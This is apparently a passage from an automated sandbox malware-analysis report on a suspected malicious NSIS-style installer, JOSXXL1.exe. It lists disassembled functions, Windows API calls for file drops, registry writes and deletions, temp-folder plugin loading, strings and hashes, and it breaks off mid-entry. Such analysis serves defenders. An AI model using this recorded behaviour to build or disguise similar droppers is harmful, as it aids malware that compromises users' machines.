                                                                                                        control_flow_graph 363 402e41-402e8f GetTickCount GetModuleFileNameW call 405d58 366 402e91-402e96 363->366 367 402e9b-402ec9 call 406183 call 405b83 call 406183 GetFileSize 363->367 368 4030e0-4030e4 366->368 375 402fb9-402fc7 call 402d9f 367->375 376 402ecf-402ee6 367->376 383 403098-40309d 375->383 384 402fcd-402fd0 375->384 377 402ee8 376->377 378 402eea-402ef7 call 403358 376->378 377->378 387 403054-40305c call 402d9f 378->387 388 402efd-402f03 378->388 383->368 385 402fd2-402fea call 40336e call 403358 384->385 386 402ffc-403048 GlobalAlloc call 406678 call 405d87 CreateFileW 384->386 385->383 411 402ff0-402ff6 385->411 413 40304a-40304f 386->413 414 40305e-40308e call 40336e call 4030e7 386->414 387->383 391 402f83-402f87 388->391 392 402f05-402f1d call 405d13 388->392 395 402f90-402f96 391->395 396 402f89-402f8f call 402d9f 391->396 392->395 410 402f1f-402f26 392->410 402 402f98-402fa6 call 40660a 395->402 403 402fa9-402fb3 395->403 396->395 402->403 403->375 403->376 410->395 415 402f28-402f2f 410->415 411->383 411->386 413->368 422 403093-403096 414->422 415->395 417 402f31-402f38 415->417 417->395 419 402f3a-402f41 417->419 419->395 421 402f43-402f63 419->421 421->383 423 402f69-402f6d 421->423 422->383 426 40309f-4030b0 422->426 424 402f75-402f7d 423->424 425 402f6f-402f73 423->425 424->395 427 402f7f-402f81 424->427 425->375 425->424 428 4030b2 426->428 429 4030b8-4030bd 426->429 427->395 428->429 430 4030be-4030c4 429->430 430->430 431 4030c6-4030de call 405d13 430->431 431->368
                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 00402E55
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\JOSXXL1.exe,00000400), ref: 00402E71
                                                                                                          • Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00405D5C
                                                                                                          • Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\JOSXXL1.exe,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00402EBA
                                                                                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403001
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                        • String ID: "C:\Users\user\Desktop\JOSXXL1.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\JOSXXL1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                        • API String ID: 2803837635-724361888
                                                                                                        • Opcode ID: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
                                                                                                        • Instruction ID: 78d4ac72044dd1d4b64dcf5cb9e774c3474f7f20f7d9c099438d2fbc404b67ba
                                                                                                        • Opcode Fuzzy Hash: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
                                                                                                        • Instruction Fuzzy Hash: 6961E231900215AFDB209F75DD49B9E7AB8AB04359F20817FFA00B62C1CBB99A458B5D
                                                                                                        Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 560 401767-40178c call 402bbf call 405bae 565 401796-4017a8 call 406183 call 405b37 lstrcatW 560->565 566 40178e-401794 call 406183 560->566 571 4017ad-4017ae call 406417 565->571 566->571 575 4017b3-4017b7 571->575 576 4017b9-4017c3 call 4064c6 575->576 577 4017ea-4017ed 575->577 585 4017d5-4017e7 576->585 586 4017c5-4017d3 CompareFileTime 576->586 578 4017f5-401811 call 405d58 577->578 579 4017ef-4017f0 call 405d33 577->579 587 401813-401816 578->587 588 401885-4018ae call 4052e2 call 4030e7 578->588 579->578 585->577 586->585 589 401867-401871 call 4052e2 587->589 590 401818-401856 call 406183 * 2 call 4061a5 call 406183 call 4058c8 587->590 602 4018b0-4018b4 588->602 603 4018b6-4018c2 SetFileTime 588->603 600 40187a-401880 589->600 590->575 622 40185c-40185d 590->622 605 402a55 600->605 602->603 604 4018c8-4018d3 CloseHandle 602->604 603->604 607 4018d9-4018dc 604->607 608 402a4c-402a4f 604->608 609 402a57-402a5b 605->609 611 4018f1-4018f4 call 4061a5 607->611 612 4018de-4018ef call 4061a5 lstrcatW 607->612 608->605 618 4018f9-40228d call 4058c8 611->618 612->618 618->609 622->600 625 40185f-401860 622->625 625->589
                                                                                                        APIs
                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\indvandrings\attraavrdig,?,?,00000031), ref: 004017A8
                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\indvandrings\attraavrdig,?,?,00000031), ref: 004017CD
                                                                                                          • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                          • Part of subcall function 004052E2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00402E19,00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 0040533D
                                                                                                          • Part of subcall function 004052E2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll), ref: 0040534F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nstA69B.tmp$C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll$C:\Users\user\AppData\Local\indvandrings\attraavrdig$Call
                                                                                                        • API String ID: 1941528284-3850150553
                                                                                                        • Opcode ID: 615e49871f4312738b2cc4977bee4007c9bdf1b1d4d7734fdea086d7982e8830
                                                                                                        • Instruction ID: 6fe11ac43b73c0a2a9a7664c997375d2890861868a1009608a3dd96d2534e176
                                                                                                        • Opcode Fuzzy Hash: 615e49871f4312738b2cc4977bee4007c9bdf1b1d4d7734fdea086d7982e8830
                                                                                                        • Instruction Fuzzy Hash: B141B531900515BFCF10BBB5CC46DAE7679EF05328B20823BF422B51E1DB3C86529A6E
                                                                                                        Function 004052E2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 626 4052e2-4052f7 627 4052fd-40530e 626->627 628 4053ae-4053b2 626->628 629 405310-405314 call 4061a5 627->629 630 405319-405325 lstrlenW 627->630 629->630 632 405342-405346 630->632 633 405327-405337 lstrlenW 630->633 635 405355-405359 632->635 636 405348-40534f SetWindowTextW 632->636 633->628 634 405339-40533d lstrcatW 633->634 634->632 637 40535b-40539d SendMessageW * 3 635->637 638 40539f-4053a1 635->638 636->635 637->638 638->628 639 4053a3-4053a6 638->639 639->628
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                        • lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                        • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00402E19,00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 0040533D
                                                                                                        • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll), ref: 0040534F
                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll
                                                                                                        • API String ID: 2531174081-287984335
                                                                                                        • Opcode ID: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
                                                                                                        • Instruction ID: 5ed309c8d3f1bf46da027166848d039c97de4a2eecd53fde705ce25c05ecf2d8
                                                                                                        • Opcode Fuzzy Hash: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
                                                                                                        • Instruction Fuzzy Hash: 4A21B075900618BBCB119FA5DD44ACFBFB8EF84390F10803AF904B62A0C7B94A51DF68
                                                                                                        Function 004057B1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 640 4057b1-4057fc CreateDirectoryW 641 405802-40580f GetLastError 640->641 642 4057fe-405800 640->642 643 405829-40582b 641->643 644 405811-405825 SetFileSecurityW 641->644 642->643 644->642 645 405827 GetLastError 644->645 645->643
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4
                                                                                                        • GetLastError.KERNEL32 ref: 00405808
                                                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040581D
                                                                                                        • GetLastError.KERNEL32 ref: 00405827
                                                                                                        Strings
                                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004057D8
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                                        • API String ID: 3449924974-3539136105
                                                                                                        • Opcode ID: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
                                                                                                        • Instruction ID: 9d8b3aa145bda6eaeb46bbd44b0caf250caa68881350f4f3315e0aaa1c0c1a31
                                                                                                        • Opcode Fuzzy Hash: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
                                                                                                        • Instruction Fuzzy Hash: 400108B1D00619EADF10DBA0D9087EFBFB8EF04314F00803AD945B6190D77996588FA9
                                                                                                        Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 646 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 653 4023c7-4023cf 646->653 654 402a4c-402a5b 646->654 656 4023d1-4023de call 402bbf lstrlenW 653->656 657 4023e2-4023e5 653->657 656->657 660 4023f5-4023f8 657->660 661 4023e7-4023f4 call 402ba2 657->661 662 402409-40241d RegSetValueExW 660->662 663 4023fa-402404 call 4030e7 660->663 661->660 668 402422-4024fc RegCloseKey 662->668 669 40241f 662->669 663->662 668->654 671 40281e-402825 668->671 669->668 671->654
                                                                                                        APIs
                                                                                                        • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstA69B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nstA69B.tmp
                                                                                                        • API String ID: 1356686001-3671796336
                                                                                                        • Opcode ID: 4fa074726b7e2bf8854870b0d1666f31c0fefbbcc168a0cac51504e48151ff81
                                                                                                        • Instruction ID: 75ab489ca3c386883e02df54fe3069bb457763bdb47647990c5a7a2e11d383c6
                                                                                                        • Opcode Fuzzy Hash: 4fa074726b7e2bf8854870b0d1666f31c0fefbbcc168a0cac51504e48151ff81
                                                                                                        • Instruction Fuzzy Hash: B8118E71A00108BFEB10AFA5DE89EAE777DEB44358F11403AF904B71D1D6B85E409668
                                                                                                        Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 672 402bff-402c28 RegOpenKeyExW 673 402c93-402c97 672->673 674 402c2a-402c35 672->674 675 402c50-402c60 RegEnumKeyW 674->675 676 402c62-402c74 RegCloseKey call 406559 675->676 677 402c37-402c3a 675->677 685 402c76-402c85 676->685 686 402c9a-402ca0 676->686 678 402c87-402c8a RegCloseKey 677->678 679 402c3c-402c4e call 402bff 677->679 683 402c90-402c92 678->683 679->675 679->676 683->673 685->673 686->683 687 402ca2-402cb0 RegDeleteKeyW 686->687 687->683 688 402cb2 687->688 688->673
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1912718029-0
                                                                                                        • Opcode ID: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
                                                                                                        • Instruction ID: 55d087fd23a1ea4965d22b091416ffa41740a626a207a29a44af1da89c0b6843
                                                                                                        • Opcode Fuzzy Hash: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
                                                                                                        • Instruction Fuzzy Hash: B3116771504118FFEF20AF90DF8CEAE3B79FB14384B10043AF905B20A0D7B48E55AA29
                                                                                                        Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 690 10001759-10001795 call 10001b18 694 100018a6-100018a8 690->694 695 1000179b-1000179f 690->695 696 100017a1-100017a7 call 10002286 695->696 697 100017a8-100017b5 call 100022d0 695->697 696->697 702 100017e5-100017ec 697->702 703 100017b7-100017bc 697->703 704 1000180c-10001810 702->704 705 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 702->705 706 100017d7-100017da 703->706 707 100017be-100017bf 703->707 712 10001812-1000184c call 100015b4 call 100024a9 704->712 713 1000184e-10001854 call 100024a9 704->713 729 10001855-10001859 705->729 706->702 708 100017dc-100017dd call 10002b5f 706->708 710 100017c1-100017c2 707->710 711 100017c7-100017c8 call 100028a4 707->711 721 100017e2 708->721 717 100017c4-100017c5 710->717 718 100017cf-100017d5 call 10002645 710->718 724 100017cd 711->724 712->729 713->729 717->702 717->711 728 100017e4 718->728 721->728 724->721 728->702 733 10001896-1000189d 729->733 734 1000185b-10001869 call 1000246c 729->734 733->694 736 1000189f-100018a0 GlobalFree 733->736 740 10001881-10001888 734->740 741 1000186b-1000186e 734->741 736->694 740->733 743 1000188a-10001895 call 1000153d 740->743 741->740 742 10001870-10001878 741->742 742->740 744 1000187a-1000187b FreeLibrary 742->744 743->733 744->740
                                                                                                        APIs
                                                                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                          • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                          • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                          • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1791698881-3916222277
                                                                                                        • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                                        • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
